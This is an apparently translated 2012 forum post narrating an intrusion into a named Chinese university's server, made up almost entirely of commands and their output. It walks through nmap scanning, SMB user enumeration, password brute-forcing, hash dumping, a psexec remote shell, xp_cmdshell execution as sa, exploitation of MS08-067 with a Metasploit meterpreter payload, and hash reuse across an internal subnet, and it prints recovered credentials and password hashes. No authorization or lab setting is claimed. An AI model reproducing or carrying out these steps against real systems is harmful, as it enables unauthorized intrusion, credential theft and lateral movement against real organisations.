nmap+msf intrusion of Guangxi Normal University (广西师范)

Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r(
SF:GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

// use this script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection (本地连接):

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use msf to exploit the ms08-067 vulnerability and overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt

test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt

44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

// use the usernames together with the obtained hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~